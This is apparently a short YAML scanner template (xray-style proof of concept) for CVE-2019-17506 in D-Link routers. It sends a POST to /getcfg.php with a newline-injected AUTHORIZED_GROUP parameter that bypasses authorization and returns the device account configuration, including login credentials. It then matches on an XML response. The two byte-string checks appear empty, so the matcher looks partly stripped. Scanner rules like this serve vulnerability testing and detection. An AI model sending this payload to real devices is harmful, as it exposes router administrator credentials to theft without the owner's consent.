name: poc-yaml-dlink-cve-2019-17506 rules: - method: POST path: /getcfg.php headers: Content-Type: application/x-www-form-urlencoded body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a follow_redirects: false expression: > response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"") && response.body.bcontains(b"") detail: author: l1nk3r,Huasir(https://github.com/dahua966/) links: - https://xz.aliyun.com/t/6453